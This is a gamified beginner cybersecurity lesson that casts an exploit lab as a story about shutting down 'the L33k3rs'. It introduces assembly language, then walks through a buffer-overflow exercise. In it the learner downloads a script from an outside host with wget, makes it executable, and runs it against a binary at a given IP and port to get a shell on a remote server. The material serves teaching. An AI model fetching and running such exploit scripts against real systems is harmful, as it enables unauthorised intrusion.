Welcome to the Final day of Cybersecurity week!
Endgame
Today is the last day of Cybersecurity week. Alice and Bob are pleased with how far you have come in your learnings and how you have helped the Cyber House in their epic battle against the L33k3rs.
Yesterday you helped the Cyber House achieve a major accomplishment. Alice and Bob, thanks to you, were able to obtain information on all member of the L33k3rs. As we speak, Cyber House agents are tracking these people down to put an end to their l33king schemes
’
Our battle against the L33k3rs is coming to a close, however there is still one thing left to do.
The Nano Bots!
We still have to shut down the nano bots. The nano bots are still in the Global Dessert Vault sending recipes to the L33k3rs. In order to stop them, we need to understand a very important programming language. Assembly Language.
Assembly Language
Assembly Language is the original true low-level computer language with pure instructions that directly translate into machine code.
To explain:
-
There are languages that are considered High-Level Programming Languages, these languages include Python, Java, Javascript, Scratch, ect. These programming languages are then broken down to a Lower-level Programing Language
-
Low-Level Programming Languages, like Assembly and Machine Code, communicate more directly with the computer. Meaning they are more closely related to the computer’s core language, like binary. (1’s and 0’s)
So why have High-Level Languages if they are just turned into a Low-Level Language?
- This is because Low-Level Languages are difficult to use and harder to understand then High-Level Languages. High-Level Languages are much easier to read, write, and maintain. If you think coding in general is hard, Assembly is that much harder.
Why do we need to know this?
We need to know what assembly does because it is going to help us take down the L33k3rs!
Alice and Bob need us to take control of a L33k3r server so we can destroy it from the inside out! This is called pwning. So we will be compromising another server to gain access, almost like how we used the File Upload Exploit to gain access to the Global Dessert Vault!
Infiltrate the L33k3rs!
So, let’s go to the terminal we have been using the past couple of days: TERMINAL
First begin by listing all the files in the home directory
ls
Next we will move into the secsoft directory
cd secsoft
Now let us list the files in this directory
ls
Let’s read the bufover-2.c file. This is a c file containing c code. This will generate
cat bufover-2.c
Now we will read the bufover-2 file. This file is the executable for the file we just read. Meaning it will run bufover-2.c.
cat bufover-2
Let’s run the executable
r2 -Ad bufover-2
Now that our process is running, let’s enter this for the input.
Vpp
What you are seeing is the assembly code for the bufover-2.c file. You can navigate through the code by using the “j” and “k” keys. To Exit out of this view, press q
q
The program is asking us a few questions, let’s answer them by pressing the enter key twice.
enter
enter
Next we are going to download some code made by Alice and Bob that will help us infiltrate the L33k3r server.
The code below is a script we will run which will create a completely new Bash Terminal that will have control over their server!
wget http://prof.ninja/bash32.sh
The command below will give the file we just downloaded exectuable permission.
chmod +x bash32.sh
Now let’s run our script to infiltrate the L33k3r Server!
./bash32.sh bufover-2 167.172.231.203 8888
We’re In!
You have now sucessfully infiltrated the L33k3r server. Now look around using the terminal to try and find anything we can use to shutdown their system or to shut down the nanobots!
Food for thought?
Maybe look for kill codes?
killcodes.txt
Once you find the Kill Code put it into Learnification.fun!
You did it!
We have successfully taken down the l33k3rs!
Alice and Bob are so proud! You have been a great help to the Cyber House. Yet there are more things for you to learn in your quest to become an agent in the Cyber House!
Go to this link here to begin your next exercise: